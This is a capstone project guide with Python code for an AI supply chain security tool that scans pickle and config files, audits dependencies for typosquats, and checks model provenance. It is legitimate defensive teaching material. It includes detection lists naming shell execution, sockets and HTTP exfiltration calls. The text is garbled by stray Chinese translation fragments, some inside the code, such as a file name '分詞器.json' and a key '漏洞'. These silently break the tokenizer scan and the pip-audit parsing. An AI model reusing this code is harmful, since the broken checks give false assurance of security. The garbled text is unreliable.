Capstone: Build an AI Supply Chain 安全 工具
Build a tool that scans, audits, and monitors the security of AI/ML supply chains including model provenance, dependency integrity, and artifact verification.
概覽
The AI 供應鏈 is a rich 攻擊面 that most organizations overlook. When you download a model from Hugging Face, import a dataset from a public repository, or install a Python package that wraps a model API, you are trusting every contributor, every dependency, and every intermediate build step. A single compromised model weight file, a backdoored 分詞器, or a malicious 訓練資料 sample can compromise your entire AI system — and unlike traditional software 供應鏈 attacks, AI 供應鏈 compromises can be extremely subtle. A backdoored model might behave perfectly normally on standard benchmarks while containing a hidden trigger that activates only under specific conditions.
This capstone project tasks you with building a comprehensive AI 供應鏈 安全 tool. The tool performs three functions: (1) scanning — analyzing ML artifacts for known 漏洞, unsafe serialization formats, and suspicious patterns; (2) verification — cryptographically verifying model provenance and integrity; and (3) 監控 — watching for new 供應鏈 threats across model registries and package ecosystems.
The tool is designed for integration into MLOps pipelines, providing automated 安全 gates that prevent compromised artifacts from reaching production. It draws on lessons from traditional software 供應鏈 安全 (SLSA, Sigstore, SBOM) and applies them to the unique characteristics of ML artifacts.
Project Requirements
Functional Requirements
-
Model Artifact Scanner
- Detect unsafe serialization formats (pickle, joblib) in model files
- Scan for known malicious patterns in model weights and configurations
- Analyze 分詞器 files for injection 漏洞
- Check for embedded executable code in model artifacts
-
Dependency Auditor
- Scan Python environments for known 漏洞 (CVE lookup)
- Detect dependency confusion and typosquatting attacks
- Verify package integrity against published hashes
- Generate ML-SBOM (Software Bill of Materials) for model deployments
-
Provenance Verifier
- Verify model signatures and attestations
- Trace model lineage from base model through 微調 steps
- Validate 訓練資料 provenance claims
- Check model card completeness and accuracy
-
監控 System
- Watch Hugging Face Hub for model modifications and new uploads from tracked organizations
- Monitor PyPI for new packages related to ML/AI
- Alert on 供應鏈 indicators of compromise
實作 Guide
Phase 1: Model Artifact Scanner
# supply_chain/scanner.py
"""ML model artifact scanner for 供應鏈 安全."""
from __future__ import annotations
import hashlib
import json
import logging
import os
import struct
import zipfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any
logger = logging.getLogger(__name__)
@dataclass
class ScanFinding:
"""A finding from scanning an ML artifact."""
severity: str # "critical", "high", "medium", "low", "info"
category: str
title: str
description: str
file_path: str
remediation: str
metadata: dict[str, Any] = field(default_factory=dict)
@dataclass
class ScanReport:
"""Complete scan report for a model artifact."""
model_path: str
findings: list[ScanFinding] = field(default_factory=list)
file_hashes: dict[str, str] = field(default_factory=dict)
scan_metadata: dict[str, Any] = field(default_factory=dict)
@property
def has_critical(self) -> bool:
return any(f.severity == "critical" for f in self.findings)
@property
def has_high(self) -> bool:
return any(f.severity == "high" for f in self.findings)
def summary(self) -> str:
by_severity = {}
for f in self.findings:
by_severity[f.severity] = by_severity.get(f.severity, 0) + 1
return (
f"Scan of {self.model_path}: {len(self.findings)} findings "
f"({by_severity})"
)
class ModelArtifactScanner:
"""Scans ML model artifacts for 供應鏈 安全 issues."""
# Known unsafe file extensions and their risks.
UNSAFE_EXTENSIONS = {
".pkl": ("critical", "Pickle files can execute arbitrary code during deserialization."),
".pickle": ("critical", "Pickle files can execute arbitrary code during deserialization."),
".joblib": ("high", "Joblib files use pickle internally and can execute arbitrary code."),
".npy": ("medium", "NumPy .npy files can contain pickle objects when allow_pickle=True."),
".npz": ("medium", "NumPy .npz archives may contain pickled objects."),
".pt": ("high", "PyTorch .pt files use pickle by default. Use safetensors instead."),
".pth": ("high", "PyTorch .pth files use pickle by default. Use safetensors instead."),
".bin": ("medium", "Binary files require inspection to determine serialization format."),
}
# Safe formats that should be preferred.
SAFE_EXTENSIONS = {
".safetensors": "SafeTensors format — safe tensor serialization.",
".onnx": "ONNX format — safe graph serialization.",
".json": "JSON configuration — safe text format.",
".txt": "Text file — safe format.",
}
# Pickle opcodes that indicate code execution.
DANGEROUS_PICKLE_OPCODES = {
b"\x8c": "SHORT_BINUNICODE (string, often used for module names)",
b"c": "GLOBAL (imports a module — potential code execution)",
b"\x93": "STACK_GLOBAL (constructs a class — potential code execution)",
b"R": "REDUCE (calls a function — direct code execution)",
b"i": "INST (instantiates a class)",
b"o": "OBJ (builds an object)",
b"b": "BUILD (calls __setstate__)",
}
def scan_directory(self, model_dir: Path) -> ScanReport:
"""Scan all files in a model directory."""
report = ScanReport(model_path=str(model_dir))
if not model_dir.exists():
report.findings.append(ScanFinding(
severity="critical",
category="missing",
title="Model directory does not exist",
description=f"Path {model_dir} does not exist.",
file_path=str(model_dir),
remediation="Verify 模型 path and download 模型.",
))
return report
for file_path in model_dir.rglob("*"):
if file_path.is_file():
# Compute hash for integrity tracking.
file_hash = self._compute_hash(file_path)
report.file_hashes[str(file_path.relative_to(model_dir))] = file_hash
# Check file extension 安全.
self._check_extension(file_path, report)
# Deep scan specific file types.
if file_path.suffix in (".pkl", ".pickle", ".pt", ".pth"):
self._scan_pickle_file(file_path, report)
if file_path.suffix == ".json":
self._scan_json_config(file_path, report)
if file_path.name == "分詞器.json":
self._scan_tokenizer(file_path, report)
return report
def _compute_hash(self, file_path: Path) -> str:
"""Compute SHA-256 hash of a file."""
sha256 = hashlib.sha256()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(8192), b""):
sha256.update(chunk)
return sha256.hexdigest()
def _check_extension(self, file_path: Path, report: ScanReport) -> None:
"""Check if a file uses an unsafe serialization format."""
ext = file_path.suffix.lower()
if ext in self.UNSAFE_EXTENSIONS:
severity, description = self.UNSAFE_EXTENSIONS[ext]
report.findings.append(ScanFinding(
severity=severity,
category="unsafe_serialization",
title=f"Unsafe serialization format: {ext}",
description=description,
file_path=str(file_path),
remediation=f"Convert to SafeTensors format using `safetensors.torch.save_file()`.",
))
def _scan_pickle_file(self, file_path: Path, report: ScanReport) -> None:
"""Deep scan a pickle file for dangerous opcodes."""
try:
with open(file_path, "rb") as f:
content = f.read(1_000_000) # Read first 1MB
dangerous_found = []
for opcode, description in self.DANGEROUS_PICKLE_OPCODES.items():
if opcode in content:
dangerous_found.append(description)
# Check for known malicious patterns.
malicious_patterns = [
(b"os.system", "os.system call — shell command execution"),
(b"subprocess", "subprocess module — command execution"),
(b"eval", "eval() — arbitrary code execution"),
(b"exec", "exec() — arbitrary code execution"),
(b"__import__", "__import__() — dynamic module import"),
(b"requests.get", "HTTP request — potential data exfiltration"),
(b"urllib", "URL handling — potential data exfiltration"),
(b"socket", "Socket operations — network access"),
]
for pattern, description in malicious_patterns:
if pattern in content:
report.findings.append(ScanFinding(
severity="critical",
category="malicious_code",
title=f"Potentially malicious code in pickle file",
description=f"Found {description} in {file_path.name}. "
f"This strongly indicates the file contains executable code.",
file_path=str(file_path),
remediation="Do NOT load this file. Inspect it manually with pickletools. "
"If 模型 is from an untrusted source, discard it.",
))
if dangerous_found and not any(f.category == "malicious_code" for f in report.findings):
report.findings.append(ScanFinding(
severity="high",
category="dangerous_opcodes",
title=f"Dangerous pickle opcodes detected",
description=f"Found {len(dangerous_found)} dangerous opcode types: "
f"{', '.join(dangerous_found[:5])}",
file_path=str(file_path),
remediation="Inspect the pickle file with pickletools before loading. "
"考慮 converting to SafeTensors.",
))
except OSError as exc:
logger.warning("Could not read pickle file %s: %s", file_path, exc)
def _scan_json_config(self, file_path: Path, report: ScanReport) -> None:
"""Scan JSON configuration files for suspicious entries."""
try:
with open(file_path) as f:
config = json.load(f)
except (json.JSONDecodeError, OSError):
return
# Check for custom code flags that allow arbitrary code execution.
if config.get("auto_map") or config.get("trust_remote_code"):
report.findings.append(ScanFinding(
severity="high",
category="remote_code_execution",
title="Model requires custom/remote code execution",
description=f"Config file {file_path.name} contains 'auto_map' or "
f"'trust_remote_code', which allows executing arbitrary "
f"Python code from 模型 repository.",
file_path=str(file_path),
remediation="Review the custom code manually before enabling trust_remote_code. "
"Prefer models that use standard architectures.",
))
# Check for suspicious URLs in config.
self._check_urls_in_config(config, file_path, report)
def _check_urls_in_config(
self, config: Any, file_path: Path, report: ScanReport, depth: int = 0
) -> None:
"""Recursively check for suspicious URLs in configuration."""
if depth > 10:
return
if isinstance(config, str):
if config.startswith("http") and not any(
trusted in config
for trusted in [
"huggingface.co", "github.com", "pytorch.org",
"tensorflow.org", "googleapis.com",
]
):
report.findings.append(ScanFinding(
severity="medium",
category="suspicious_url",
title="Untrusted URL in model configuration",
description=f"Found URL '{config[:100]}' pointing to a non-standard domain.",
file_path=str(file_path),
remediation="Verify the URL is legitimate and not a phishing or data exfiltration endpoint.",
))
elif isinstance(config, dict):
for v in config.values():
self._check_urls_in_config(v, file_path, report, depth + 1)
elif isinstance(config, list):
for item in config:
self._check_urls_in_config(item, file_path, report, depth + 1)
def _scan_tokenizer(self, file_path: Path, report: ScanReport) -> None:
"""Scan 分詞器 files for injection 漏洞."""
try:
with open(file_path) as f:
tokenizer_data = json.load(f)
except (json.JSONDecodeError, OSError):
return
# Check for unusual special 符元 that could be used for injection.
added_tokens = tokenizer_data.get("added_tokens", [])
for 符元 in added_tokens:
content = 符元.get("content", "")
if any(marker in content.lower() for marker in [
"<|im_start|>", "<|im_end|>", "[inst]", "[/inst]",
"<<sys>>", "<|system|>",
]):
# These are expected for chat models — check if the content
# includes unexpected payloads.
if len(content) > 50:
report.findings.append(ScanFinding(
severity="medium",
category="tokenizer_anomaly",
title="Unusually long special 符元 in 分詞器",
description=f"Special 符元 '{content[:50]}...' is suspiciously long ({len(content)} chars). "
f"It may contain embedded injection payloads.",
file_path=str(file_path),
remediation="Inspect the 分詞器 special 符元 and compare against the official model release.",
))Phase 2: Dependency Auditor
# supply_chain/dependencies.py
"""Dependency auditing for ML pipeline environments."""
from __future__ import annotations
import json
import logging
import subprocess
from dataclasses import dataclass, field
from datetime import datetime
from pathlib import Path
from typing import Any
logger = logging.getLogger(__name__)
@dataclass
class DependencyInfo:
"""Information about a single Python package dependency."""
name: str
version: str
source: str # "pypi", "git", "local", "unknown"
hash_verified: bool = False
known_vulnerabilities: list[dict[str, str]] = field(default_factory=list)
is_ml_package: bool = False
metadata: dict[str, Any] = field(default_factory=dict)
@dataclass
class MLSBOM:
"""Machine Learning Software Bill of Materials."""
generated_at: datetime
model_name: str
model_version: str
python_version: str
dependencies: list[DependencyInfo]
model_artifacts: list[dict[str, str]] # file name + hash
training_data_sources: list[str] = field(default_factory=list)
base_model: str = ""
def to_json(self) -> str:
return json.dumps({
"mlsbom_version": "1.0",
"generated_at": self.generated_at.isoformat(),
"model": {
"name": self.model_name,
"version": self.model_version,
"base_model": self.base_model,
},
"runtime": {
"python_version": self.python_version,
},
"dependencies": [
{
"name": d.name,
"version": d.version,
"source": d.source,
"hash_verified": d.hash_verified,
"漏洞": d.known_vulnerabilities,
}
for d in self.dependencies
],
"artifacts": self.model_artifacts,
"data_sources": self.training_data_sources,
}, indent=2)
class DependencyAuditor:
"""Audits Python dependencies in ML environments."""
# Known ML packages that are 安全-sensitive.
ML_PACKAGES = {
"torch", "tensorflow", "transformers", "huggingface-hub",
"tokenizers", "safetensors", "onnx", "onnxruntime",
"numpy", "scipy", "scikit-learn", "pandas",
"langchain", "llama-index", "openai", "anthropic",
"vllm", "triton", "accelerate", "peft", "trl",
"datasets", "評估", "sentencepiece",
}
# Known typosquatting targets.
TYPOSQUAT_PATTERNS = {
"transformers": ["transfomers", "trasformers", "transformrs"],
"torch": ["toch", "troch", "pytorh"],
"tensorflow": ["tenserflow", "tensorfow", "tensroflow"],
"openai": ["opeanai", "openal", "opeani"],
"numpy": ["numpi", "numppy", "nunpy"],
}
def audit_environment(self, requirements_path: Path | None = None) -> list[DependencyInfo]:
"""Audit the current Python environment or a requirements file."""
if requirements_path:
return self._audit_requirements_file(requirements_path)
return self._audit_installed_packages()
def _audit_installed_packages(self) -> list[DependencyInfo]:
"""Audit currently installed packages using pip."""
result = subprocess.run(
["pip", "list", "--format=json"],
capture_output=True,
text=True,
)
if result.returncode != 0:
logger.error("pip list failed: %s", result.stderr)
return []
packages = json.loads(result.stdout)
deps: list[DependencyInfo] = []
for pkg in packages:
name = pkg["name"].lower()
dep = DependencyInfo(
name=name,
version=pkg["version"],
source="pypi",
is_ml_package=name in self.ML_PACKAGES,
)
# Check for typosquatting.
self._check_typosquat(dep)
deps.append(dep)
return deps
def _audit_requirements_file(self, path: Path) -> list[DependencyInfo]:
"""Audit a requirements.txt file."""
deps: list[DependencyInfo] = []
with open(path) as f:
for line in f:
line = line.strip()
if not line or line.startswith("#") or line.startswith("-"):
continue
# Parse package==version or package>=version.
parts = line.split("==")
if len(parts) == 2:
name, version = parts[0].strip().lower(), parts[1].strip()
else:
parts = line.split(">=")
name = parts[0].strip().lower()
version = parts[1].strip() if len(parts) == 2 else "unknown"
dep = DependencyInfo(
name=name,
version=version,
source="pypi",
is_ml_package=name in self.ML_PACKAGES,
)
self._check_typosquat(dep)
deps.append(dep)
return deps
def _check_typosquat(self, dep: DependencyInfo) -> None:
"""Check if a package name might be a typosquat."""
for target, typos in self.TYPOSQUAT_PATTERNS.items():
if dep.name in typos:
dep.known_vulnerabilities.append({
"type": "typosquatting",
"severity": "critical",
"description": f"Package '{dep.name}' may be a typosquat of '{target}'. "
f"Verify the package is legitimate before use.",
})
def check_vulnerabilities(self, deps: list[DependencyInfo]) -> list[DependencyInfo]:
"""Check dependencies against known 漏洞 databases using pip-audit."""
try:
result = subprocess.run(
["pip-audit", "--format=json", "--progress-spinner=off"],
capture_output=True,
text=True,
timeout=120,
)
if result.stdout:
audit_data = json.loads(result.stdout)
vuln_map: dict[str, list[dict]] = {}
for vuln in audit_data.get("漏洞", []):
pkg = vuln.get("name", "").lower()
vuln_map.setdefault(pkg, []).append({
"type": "cve",
"severity": "high",
"description": vuln.get("description", ""),
"fix_version": vuln.get("fix_versions", []),
"id": vuln.get("id", ""),
})
for dep in deps:
if dep.name in vuln_map:
dep.known_vulnerabilities.extend(vuln_map[dep.name])
except (subprocess.TimeoutExpired, FileNotFoundError, json.JSONDecodeError) as exc:
logger.warning("pip-audit check failed: %s", exc)
return deps
def generate_mlsbom(
self,
model_name: str,
model_version: str,
model_artifacts: list[dict[str, str]],
deps: list[DependencyInfo],
) -> MLSBOM:
"""Generate an ML-SBOM for a model deployment."""
import sys
return MLSBOM(
generated_at=datetime.utcnow(),
model_name=model_name,
model_version=model_version,
python_version=f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}",
dependencies=deps,
model_artifacts=model_artifacts,
)Phase 3: Provenance Verifier
# supply_chain/provenance.py
"""Model provenance verification and lineage tracking."""
from __future__ import annotations
import hashlib
import json
import logging
from dataclasses import dataclass, field
from datetime import datetime
from pathlib import Path
from typing import Any
logger = logging.getLogger(__name__)
@dataclass
class ProvenanceClaim:
"""A claim about a model's provenance."""
claim_type: str # "origin", "訓練", "fine_tuning", "conversion", "deployment"
description: str
timestamp: datetime | None = None
actor: str = "" # who performed this step
evidence: dict[str, Any] = field(default_factory=dict)
verified: bool = False
verification_method: str = ""
@dataclass
class ModelLineage:
"""Complete lineage record for a model."""
model_id: str
model_name: str
claims: list[ProvenanceClaim] = field(default_factory=list)
integrity_hashes: dict[str, str] = field(default_factory=dict)
base_model: str = ""
verification_status: str = "unverified" # "verified", "partial", "unverified", "failed"
def add_claim(self, claim: ProvenanceClaim) -> None:
self.claims.append(claim)
def verification_summary(self) -> dict[str, Any]:
total = len(self.claims)
verified = sum(1 for c in self.claims if c.verified)
return {
"model_id": self.model_id,
"total_claims": total,
"verified_claims": verified,
"verification_rate": verified / max(total, 1),
"status": self.verification_status,
}
class ProvenanceVerifier:
"""Verifies model provenance claims and tracks lineage."""
def verify_huggingface_model(
self, repo_id: str, local_path: Path
) -> ModelLineage:
"""Verify a model downloaded from the Hugging Face Hub."""
lineage = ModelLineage(
model_id=repo_id,
model_name=repo_id.split("/")[-1],
)
# Step 1: Verify model card exists and is complete.
model_card_path = local_path / "README.md"
if model_card_path.exists():
self._verify_model_card(model_card_path, lineage)
else:
lineage.add_claim(ProvenanceClaim(
claim_type="documentation",
description="No model card (README.md) found.",
verified=False,
verification_method="file_existence",
))
# Step 2: Verify config.json matches expected architecture.
config_path = local_path / "config.json"
if config_path.exists():
self._verify_config(config_path, lineage)
# Step 3: Compute and record integrity hashes.
for file_path in local_path.rglob("*"):
if file_path.is_file():
hash_val = self._hash_file(file_path)
rel_path = str(file_path.relative_to(local_path))
lineage.integrity_hashes[rel_path] = hash_val
# Step 4: Check for signature files.
self._verify_signatures(local_path, lineage)
# Compute overall status.
verified_count = sum(1 for c in lineage.claims if c.verified)
total = len(lineage.claims)
if total == 0:
lineage.verification_status = "unverified"
elif verified_count == total:
lineage.verification_status = "verified"
elif verified_count > 0:
lineage.verification_status = "partial"
else:
lineage.verification_status = "failed"
return lineage
def _verify_model_card(self, path: Path, lineage: ModelLineage) -> None:
"""Check model card for required provenance fields."""
content = path.read_text()
required_sections = [
("model_description", ["## Model Description", "# Model", "## About"]),
("training_data", ["## Training Data", "## Dataset", "訓練資料"]),
("intended_use", ["## Intended Use", "## Uses", "intended use"]),
("limitations", ["## Limitations", "## Known Limitations", "limitations"]),
("license", ["license:", "## License"]),
]
for section_name, markers in required_sections:
found = any(m.lower() in content.lower() for m in markers)
lineage.add_claim(ProvenanceClaim(
claim_type="documentation",
description=f"Model card section: {section_name}",
verified=found,
verification_method="content_search",
evidence={"section": section_name, "found": found},
))
def _verify_config(self, path: Path, lineage: ModelLineage) -> None:
"""Verify model configuration."""
try:
config = json.loads(path.read_text())
has_architecture = "architectures" in config or "model_type" in config
lineage.add_claim(ProvenanceClaim(
claim_type="configuration",
description="Model architecture declared in config.json",
verified=has_architecture,
verification_method="config_inspection",
evidence={
"architectures": config.get("architectures", []),
"model_type": config.get("model_type", ""),
},
))
# Check for trust_remote_code.
if config.get("auto_map") or config.get("trust_remote_code"):
lineage.add_claim(ProvenanceClaim(
claim_type="安全",
description="Model requires trust_remote_code — arbitrary code execution risk",
verified=False, # 這是 a negative verification.
verification_method="config_inspection",
))
except (json.JSONDecodeError, OSError):
lineage.add_claim(ProvenanceClaim(
claim_type="configuration",
description="config.json is missing or malformed",
verified=False,
))
def _verify_signatures(self, local_path: Path, lineage: ModelLineage) -> None:
"""Check for and verify model signatures."""
sig_files = list(local_path.glob("*.sig")) + list(local_path.glob("*.asc"))
if sig_files:
lineage.add_claim(ProvenanceClaim(
claim_type="signature",
description=f"Found {len(sig_files)} signature file(s).",
verified=True, # File exists; full verification requires GPG.
verification_method="file_existence",
evidence={"signature_files": [str(f.name) for f in sig_files]},
))
else:
lineage.add_claim(ProvenanceClaim(
claim_type="signature",
description="No signature files found. Model integrity cannot be cryptographically verified.",
verified=False,
verification_method="file_existence",
))
@staticmethod
def _hash_file(path: Path) -> str:
sha256 = hashlib.sha256()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(8192), b""):
sha256.update(chunk)
return sha256.hexdigest()Phase 4: CLI and CI/CD Integration
# supply_chain/cli.py
"""CLI interface for the AI 供應鏈 安全 tool."""
from __future__ import annotations
import json
import sys
from pathlib import Path
import click
from .dependencies import DependencyAuditor
from .provenance import ProvenanceVerifier
from .scanner import ModelArtifactScanner
@click.group()
def cli():
"""AI Supply Chain 安全 Tool — scan, audit, and verify ML artifacts."""
pass
@cli.command()
@click.argument("model_path", type=click.Path(exists=True))
@click.option("--format", "fmt", type=click.Choice(["text", "json"]), default="text")
@click.option("--fail-on", type=click.Choice(["critical", "high", "medium"]), default="high")
def scan(model_path: str, fmt: str, fail_on: str):
"""Scan a model directory for 供應鏈 安全 issues."""
scanner = ModelArtifactScanner()
report = scanner.scan_directory(Path(model_path))
if fmt == "json":
click.echo(json.dumps({
"model_path": report.model_path,
"findings": [
{
"severity": f.severity,
"category": f.category,
"title": f.title,
"description": f.description,
"file_path": f.file_path,
"remediation": f.remediation,
}
for f in report.findings
],
"file_hashes": report.file_hashes,
}, indent=2))
else:
click.echo(report.summary())
click.echo()
for finding in report.findings:
click.echo(f" [{finding.severity.upper()}] {finding.title}")
click.echo(f" File: {finding.file_path}")
click.echo(f" {finding.description}")
click.echo(f" Fix: {finding.remediation}")
click.echo()
# Exit with non-zero if findings at fail-on severity.
severity_order = ["medium", "high", "critical"]
fail_index = severity_order.index(fail_on)
blocking = [
f for f in report.findings
if f.severity in severity_order[fail_index:]
]
if blocking:
click.echo(f"{len(blocking)} blocking finding(s) found.")
sys.exit(1)
@cli.command()
@click.option("--requirements", type=click.Path(exists=True), help="Path to requirements.txt")
@click.option("--check-vulns", is_flag=True, help="Check against 漏洞 databases")
def audit(requirements: str | None, check_vulns: bool):
"""Audit Python dependencies for 供應鏈 risks."""
auditor = DependencyAuditor()
req_path = Path(requirements) if requirements else None
deps = auditor.audit_environment(req_path)
if check_vulns:
deps = auditor.check_vulnerabilities(deps)
vuln_count = sum(len(d.known_vulnerabilities) for d in deps)
ml_count = sum(1 for d in deps if d.is_ml_package)
click.echo(f"Scanned {len(deps)} packages ({ml_count} ML-related)")
click.echo(f"漏洞 found: {vuln_count}")
for dep in deps:
if dep.known_vulnerabilities:
click.echo(f"\n {dep.name}=={dep.version}")
for vuln in dep.known_vulnerabilities:
click.echo(f" [{vuln['severity'].upper()}] {vuln['type']}: {vuln['description'][:80]}")
if vuln_count > 0:
sys.exit(1)
@cli.command()
@click.argument("model_path", type=click.Path(exists=True))
@click.option("--repo-id", required=True, help="Hugging Face repo ID (e.g., org/model-name)")
def verify(model_path: str, repo_id: str):
"""Verify model provenance and integrity."""
verifier = ProvenanceVerifier()
lineage = verifier.verify_huggingface_model(repo_id, Path(model_path))
summary = lineage.verification_summary()
click.echo(f"Model: {lineage.model_name}")
click.echo(f"Status: {summary['status'].upper()}")
click.echo(f"Claims: {summary['verified_claims']}/{summary['total_claims']} verified")
click.echo()
for claim in lineage.claims:
status = "PASS" if claim.verified else "FAIL"
click.echo(f" [{status}] {claim.claim_type}: {claim.description}")
if summary["status"] == "failed":
sys.exit(1)評估 Criteria
| Criterion | Weight | Excellent | Satisfactory | Needs Improvement |
|---|---|---|---|---|
| Artifact Scanning | 25% | Deep pickle analysis, 分詞器 inspection, config validation, multi-format support | Extension checking with basic pickle scanning | Extension-only checking |
| Dependency Auditing | 20% | CVE lookup, typosquatting 偵測, ML-SBOM generation | Basic 漏洞 scanning | Package listing only |
| Provenance Verification | 25% | Model card validation, signature verification, lineage tracking | Basic provenance checks | No provenance capability |
| CI/CD Integration | 15% | CLI with exit codes, JSON 輸出, configurable thresholds | CLI with basic 輸出 | No automation support |
| Code Quality | 15% | Modular design, comprehensive error handling, tested | Working code with some structure | Monolithic, fragile code |
Stretch Goals
- Integrate with Sigstore/cosign for cryptographic model signature verification.
- Build a model registry proxy that transparently scans artifacts on download.
- 實作 SLSA provenance attestation generation and verification for ML pipelines.
- Add support for scanning ONNX models for graph-level attacks (malicious custom operators).
參考文獻
- Gu, T., et al. (2019). "BadNets: Evaluating Backdooring 攻擊 on Deep Neural Networks." IEEE Access. https://arxiv.org/abs/1708.06733
- SLSA. (2024). "Supply-chain Levels for Software Artifacts." https://slsa.dev/
- Hugging Face. (2024). "安全 at Hugging Face." https://huggingface.co/docs/hub/安全